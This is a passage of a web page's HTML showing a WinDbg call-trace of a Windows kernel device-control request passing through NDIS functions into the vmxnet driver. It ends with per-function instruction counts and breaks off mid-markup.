nt!MmProbeAndLockPages</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 11 233 [ 1] nt!IopGetMountFlag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 232 1017 [ 0] nt!IopXxxControlFile</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 8 0 [ 1] nt!IopSynchronousServiceTail</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 7 0 [ 2] hal!KfRaiseIrql</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 28 7 [ 1] nt!IopSynchronousServiceTail</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 9 0 [ 2] nt!IopUpdateOtherOperationCount</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 2] nt!ExInterlockedAddLargeStatistic</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 32 19 [ 1] nt!IopSynchronousServiceTail</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 2] nt!IofCallDriver</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 14 0 [ 2] nt!IopfCallDriver</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 64 0 [ 3] NDIS!ndisDeviceControlIrpHandler</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 44 0 [ 4] nt!ExAllocatePoolWithTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 5] nt!ExInterlockedPopEntrySList</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 5] nt!ExpInterlockedPopEntrySListResume</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 5] nt!ExpInterlockedPopEntrySListFault</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 5] nt!ExpInterlockedPopEntrySListEnd</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 73 14 [ 4] nt!ExAllocatePoolWithTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 108 87 [ 3] NDIS!ndisDeviceControlIrpHandler</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 42 0 [ 4] nt!MmMapLockedPagesSpecifyCache</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 19 0 [ 5] nt!MiReserveSystemPtes</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 43 0 [ 6] nt!ExRemoveHeadNBQueue</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 12 0 [ 7] nt!ExfInterlockedCompareExchange64</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 50 12 [ 6] nt!ExRemoveHeadNBQueue</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 13 0 [ 7] nt!InterlockedPushEntrySList</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 56 25 [ 6] nt!ExRemoveHeadNBQueue</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 44 81 [ 5] nt!MiReserveSystemPtes</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 123 125 [ 4] nt!MmMapLockedPagesSpecifyCache</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="color: lime;">122 335 [ 3] NDIS!ndisDeviceControlIrpHandler </span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="color: lime;">31 0 [ 4] NDIS!ndisQueryStatisticsOids </span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="color: yellow;">71 0 [ 5] nt!ExAllocatePoolWithTag</span></span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 6] hal!KeRaiseIrqlToDpcLevel</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 173 5 [ 5] nt!ExAllocatePoolWithTag</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 104 178 [ 4] NDIS!ndisQueryStatisticsOids</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 52 0 [ 5] NDIS!ndisValidOid</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 120 230 [ 4] NDIS!ndisQueryStatisticsOids</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 20 0 [ 5] NDIS!ndisQueryDeviceOid</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 13 0 [ 6] NDIS!ndisQuerySetMiniport</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 7] NDIS!ndisReferencePackage</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 57 0 [ 8] nt!MmLockPagableSectionByHandle</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 24 0 [ 9] nt!MiLockCode</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 7 0 [ 10] hal!KfRaiseIrql</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 28 7 [ 9] nt!MiLockCode</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 23 0 [ 10] nt!ExAcquireResourceExclusiveLite</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 30 30 [ 9] nt!MiLockCode</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 10] hal!KeRaiseIrqlToDpcLevel</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 489 35 [ 9] nt!MiLockCode</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 31 0 [ 10] nt!ExReleaseResourceLite</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 496 66 [ 9] nt!MiLockCode</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 73 562 [ 8] nt!MmLockPagableSectionByHandle</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 10 635 [ 7] NDIS!ndisReferencePackage</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 27 645 [ 6] NDIS!ndisQuerySetMiniport</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 14 0 [ 7] nt!KeInitializeEvent</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 44 659 [ 6] NDIS!ndisQuerySetMiniport</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 5 0 [ 7] hal!KfAcquireSpinLock</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 47 664 [ 6] NDIS!ndisQuerySetMiniport</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 0 [ 7] nt!PsGetCurrentThread</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 52 666 [ 6] NDIS!ndisQuerySetMiniport</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 9 0 [ 7] NDIS!ndisMQueueRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 58 675 [ 6] NDIS!ndisQuerySetMiniport</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 2 0 [ 7] nt!PsGetCurrentThread</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 62 677 [ 6] NDIS!ndisQuerySetMiniport</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 24 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 7] NDIS!ndisMDoRequests</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 16 0 [ 8] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 8] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 8] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 8] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 8] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 13 0 [ 8] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] nt!KefReleaseSpinLockFromDpcLevel</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 3 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 9] NDIS!ndisMDispatchRequest</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">*** ERROR: Module load completed but symbols could not be loaded for vmxnet.sys</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> <b>1 0 [ 10] vmxnet</b></span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 10] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 1 0 [ 11] vmxnet</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 30 0 [ 11] nt!memcpy</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ...</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ...</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ...</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">19154 instructions were executed in 1347 events (0 from other threads)</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">Function Name Invocations MinInst MaxInst AvgInst</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!__security_check_cookie 2 5 5 5</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!_alldiv 1 1 1 1</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!_allmul 1 1 1 1</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisDereferencePackage 8 9 9 9</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisDeviceControlIrpHandler 1 158 158 158</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisMDispatchRequest 152 1 17 3</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisMDoRequests272 1 24 2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisMQueueRequest8 9 9 9</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisMSyncQueryInformationComplete 96 1 27 4</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisQueryDeviceOid 8 22 22 22</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;">NDIS!ndisQuerySetMiniport 8 92 92 92</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; 